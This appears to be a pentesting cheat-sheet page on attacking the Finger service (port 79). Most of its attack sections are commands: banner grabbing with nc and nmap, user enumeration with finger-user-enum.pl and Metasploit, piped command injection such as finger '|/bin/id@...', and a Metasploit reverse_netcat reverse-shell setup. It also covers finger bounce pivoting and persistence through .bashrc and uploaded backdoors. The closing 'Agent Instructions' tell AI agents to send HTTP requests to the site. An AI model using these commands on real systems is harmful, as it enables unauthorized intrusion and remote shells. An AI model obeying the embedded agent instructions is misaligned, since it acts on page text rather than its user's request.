# Finger - Port 79
Support VeryLazyTech 🎉
* Become VeryLazyTech [**member**](https://buymeacoffee.com/verylazytech/membership)**! 🎁**
* **Follow** us on **Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**,** **Github** [**@VeryLazyTech**](https://github.com/verylazytech)**, and Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* Visit our [**shop** ](https://buymeacoffee.com/verylazytech/extras)for e-books and courses. 📚
* Support us and [**buy me a coffee**](https://buymeacoffee.com/verylazytech)**. ☕**
## **Basic Information**
The **Finger protocol** is designed to provide details about users on a system. This includes information such as login names, full names, office locations, phone numbers, idle times, last mail read, and content of user project files. Despite its legitimate use, it’s a high-value target for attackers due to its unauthenticated access and support for remote queries.
**Default Port:** 79
The service’s vulnerability to user enumeration and its ability to run shell commands make it dangerous when exposed to the public internet or used without appropriate security measures.
***
## **Attacker Workflow**
#### **Reconnaissance (Banner Grabbing)**
Identify if the Finger protocol is running and gather system and user information through simple banner grabbing or `finger @target` requests.
#### **Enumeration (Gathering User Information)**
Use `finger-user-enum.pl`, Nmap, or Metasploit to enumerate user accounts on the system, including service accounts and administrative users.
#### **Exploitation (Command Injection)**
If vulnerable, inject system commands using the Finger protocol to execute code remotely. Combine this with Metasploit for reverse shell payloads or custom scripts for command execution.
**Lateral Movement (Finger Bounce)**
Use the Finger bounce attack to pivot between systems, moving from the external-facing machine to internal, protected machines.
**Post-Exploitation (System Access and Persistence)**
Once inside, attackers can escalate privileges and establish persistence, such as modifying `.bashrc` files or uploading backdoors using file-transfer utilities (e.g., SCP).
***
### **Banner Grabbing and Basic Connection**
Banner grabbing is the first step to identify if the Finger service is running and what version is in use. By connecting to the port and sending specific queries, you can glean information about the users and potentially vulnerable system details.
```bash
nc -vn 79
echo "root" | nc -vn 79
```
```bash
nmap -sV -p 79 --script=banner
```
**What to Look For:**
* Operating system versions.
* Finger daemon versions (older or custom versions could be susceptible to additional vulnerabilities, such as remote command execution).
### **User Enumeration (Finding Users)**
User enumeration is one of the most common techniques to exploit the Finger protocol. You can attempt to gather information about system users, which can then be leveraged in brute-force password attacks, social engineering, or privilege escalation.
```bash
finger @ # List all users on the system
finger admin@ # Get info of a specific user
finger user@ # Get info of a specific user
```
**PentestMonkey’s finger-user-enum.pl**: A powerful Perl-based enumeration tool that can test multiple users and targets at once.
```bash
finger-user-enum.pl -U users.txt -t
finger-user-enum.pl -u root -t
finger-user-enum.pl -U users.txt -T ips.txt
```
**Metasploit’s Finger Enumeration Module**:
```bash
use auxiliary/scanner/finger/finger_users
set RHOSTS
set USER_FILE
run
```
**Nmap’s finger script:**
```bash
nmap -p 79 --script finger
```
### **Remote Command Execution**
Advanced hackers can exploit weaknesses in some Finger service implementations that allow command injection. This vulnerability allows you to execute system commands by crafting specific requests to the Finger service.
```bash
finger "|/bin/id@example.com" # Execute the 'id' command to check user privileges
finger "|/bin/ls -a /@example.com" # Execute the 'ls' command to list directories
```
If the Finger service allows piping to system commands (due to poor input sanitization), you can run arbitrary commands on the victim machine.
**Metasploit Module (Custom Payloads)**: An attacker could modify the `auxiliary/scanner/finger/finger_users` module to include shell injection payloads, exploiting the command execution vulnerability in real time.
```bash
use auxiliary/scanner/finger/finger_users
set RHOSTS
set PAYLOAD cmd/unix/reverse_netcat
set LHOST
set LPORT 4444
exploit
```
### **Finger Bounce (Relaying Requests)**
The **Finger bounce attack** is an interesting lateral movement technique that involves using the Finger service on one host to query another host. In this case, you can pivot from a compromised system to target an internal machine behind a firewall, leveraging the compromised host as a relay for the Finger query.
```bash
finger user@host@victim # Send a Finger request to the internal machine through an intermediate compromised host.
finger @internal@external # Another format for bouncing the query.
```
### **Finger Misconfigurations and Supply Chain Attacks**
**Access to Plan Files**: Finger sometimes provides access to user-specific plan and project files, which might include sensitive information such as project timelines, confidential documents, or even credentials.
***
## **Common Vulnerabilities**
* **CVE-1999-0601**: Finger service is enabled, allowing remote users to enumerate valid users on the system, exposing the system to brute force or privilege escalation attacks.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://www.verylazytech.com/network-pentesting/finger-port-79.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.